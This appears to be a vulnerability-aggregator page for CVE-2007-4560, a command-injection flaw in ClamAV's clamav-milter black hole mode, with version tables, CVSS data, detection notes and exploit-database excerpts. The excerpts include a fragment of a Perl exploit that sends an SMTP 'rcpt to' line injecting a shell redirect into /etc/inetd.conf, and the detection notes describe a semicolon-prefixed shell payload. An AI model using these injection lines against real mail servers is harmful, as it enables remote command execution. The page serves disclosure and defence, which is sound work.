CVE-2007-4560
published 2007-08-28CVE-2007-4560: clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are…
PriorityP272high7.6CVSS 2.0
AVNACHAuNCCICAC
EXPLOIT
EPSS
83.54%
99.6th percentile
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clam_anti-virus | clamav | <= 0.91.1 | — |
| clamav | clamav | >= 0 < 0.91.2-1~volatile1 | 0.91.2-1~volatile1 |
| clamav | clamav | >= 0 < 0.91.2-1~volatile1 | 0.91.2-1~volatile1 |
| clamav | clamav | >= 0 < 0.91.2-1~volatile1 | 0.91.2-1~volatile1 |
| clamav | clamav | >= 0 < 0.91.2-1~volatile1 | 0.91.2-1~volatile1 |
| debian | clamav | < clamav 0.91.2-1~volatile1 (bookworm) | clamav 0.91.2-1~volatile1 (bookworm) |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect shell metacharacters injected into the SMTP RCPT TO field targeting clamav-milter in black hole mode; the exploit injects a semicolon-delimited shell command into the recipient address. ↗
- →Detect malicious payload injected into the SMTP From: header as a semicolon-prefixed shell command (e.g., 'From: ;<payload>'), which is written to a clamav-milter temp file and later executed via 'sh msg*'. ↗
- →Monitor for shell execution of wildcard-expanded filenames in /tmp/clamav-* directories, indicative of the 'sh msg*' payload execution technique used by this exploit. ↗
- →Alert on SMTP RCPT TO commands containing shell redirection characters (e.g., >, |) or semicolons, which are the metacharacters exploited in the insecure popen() call. ↗
- ·The vulnerability is only exploitable when clamav-milter is run with black hole mode enabled; deployments without black hole mode are not affected. ↗
- ·The exploit targets ClamAV versions prior to 0.91.2; upgrading to 0.91.2 or later resolves the insecure popen() argument escaping issue. ↗
CVSS provenance
nvdv2.07.6HIGHAV:N/AC:H/Au:N/C:C/I:C/A:C
osv7.6HIGH
vendor_debian7.6HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-86rv-pvv7-jwp8: clamav-milter in ClamAV before 0
ghsa_unreviewed·2022-05-01
CVE-2007-4560 [HIGH] CWE-78 GHSA-86rv-pvv7-jwp8: clamav-milter in ClamAV before 0
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."
OSV
CVE-2007-4560: clamav-milter in ClamAV before 0
osv·2007-08-28·CVSS 7.6
CVE-2007-4560 [HIGH] CVE-2007-4560: clamav-milter in ClamAV before 0
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."
Debian
CVE-2007-4560: clamav - clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remot...
vendor_debian·2007·CVSS 7.6
CVE-2007-4560 [HIGH] CVE-2007-4560: clamav - clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remot...
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."
Scope: local
bookworm: resolved (fixed in 0.91.2-1~volatile1)
bullseye: resolved (fixed in 0.91.2-1~volatile1)
forky: resolved (fixed in 0.91.2-1~volatile1)
sid: resolved (fixed in 0.91.2-1~volatile1)
trixie: resolved (fixed in 0.91.2-1~volatile1)
No detection rules found.
Exploit-DB
ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)
exploitdb·2010-10-09
CVE-2007-4560 ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)
ClamAV Milter - Blackhole-Mode Remote Code Execution (Metasploit)
---
##
# $Id: clamav_milter_blackhole.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ClamAV Milter Blackhole-Mode Remote Code Execution',
'Description' => %q{
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
When implemented with black hole mode enabled, it is possible to execute
commands remotely due to an insecure popen call.
},
'Author' => [ 'patr
Exploit-DB
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
exploitdb·2007-12-21
CVE-2007-4560 Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
Sendmail with clamav-milter new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: > /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: \r\n";
print $sock "data\r\n.\r\nquit\r\n";
while () {
print;
}
# milw0rm.com [2007-12-21]
Exploit-DB
ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)
exploitdb·2007-08-24
CVE-2007-4560 ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)
ClamAV Milter 0.92.2 - Blackhole-Mode (Sendmail) Code Execution (Metasploit)
---
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'ClamAV Milter Blackhole-Mode Remote Code Execution',
'Description' => %q{
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'
(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.
When implemented with black hole mode enabled, it is possible to execute
commands remotely due to an insecure popen call.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$R
Metasploit
ClamAV Milter Blackhole-Mode Remote Code Execution
metasploit
ClamAV Milter Blackhole-Mode Remote Code Execution
ClamAV Milter Blackhole-Mode Remote Code Execution
This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter' (Sendmail mail filter). Versions prior to v0.92.2 are vulnerable. When implemented with black hole mode enabled, it is possible to execute commands remotely due to an insecure popen call.
http://docs.info.apple.com/article.html?artnum=307562http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.htmlhttp://secunia.com/advisories/26654http://secunia.com/advisories/26674http://secunia.com/advisories/26683http://secunia.com/advisories/26751http://secunia.com/advisories/26822http://secunia.com/advisories/26916http://secunia.com/advisories/29420http://security.gentoo.org/glsa/glsa-200709-14.xmlhttp://securityreason.com/securityalert/3063http://www.debian.org/security/2007/dsa-1366http://www.mandriva.com/security/advisories?name=MDKSA-2007:172http://www.novell.com/linux/security/advisories/2007_18_sr.htmlhttp://www.nruns.com/security_advisory_clamav_remote_code_exection.phphttp://www.securityfocus.com/archive/1/477723/100/0/threadedhttp://www.securityfocus.com/bid/25439http://www.securitytracker.com/id?1018610http://www.trustix.org/errata/2007/0026/http://www.vupen.com/english/advisories/2008/0924/referenceshttps://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.htmlhttp://docs.info.apple.com/article.html?artnum=307562http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.htmlhttp://secunia.com/advisories/26654http://secunia.com/advisories/26674http://secunia.com/advisories/26683http://secunia.com/advisories/26751http://secunia.com/advisories/26822http://secunia.com/advisories/26916http://secunia.com/advisories/29420http://security.gentoo.org/glsa/glsa-200709-14.xmlhttp://securityreason.com/securityalert/3063http://www.debian.org/security/2007/dsa-1366http://www.mandriva.com/security/advisories?name=MDKSA-2007:172http://www.novell.com/linux/security/advisories/2007_18_sr.htmlhttp://www.nruns.com/security_advisory_clamav_remote_code_exection.phphttp://www.securityfocus.com/archive/1/477723/100/0/threadedhttp://www.securityfocus.com/bid/25439http://www.securitytracker.com/id?1018610http://www.trustix.org/errata/2007/0026/http://www.vupen.com/english/advisories/2008/0924/referenceshttps://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.html
2007-08-28
Published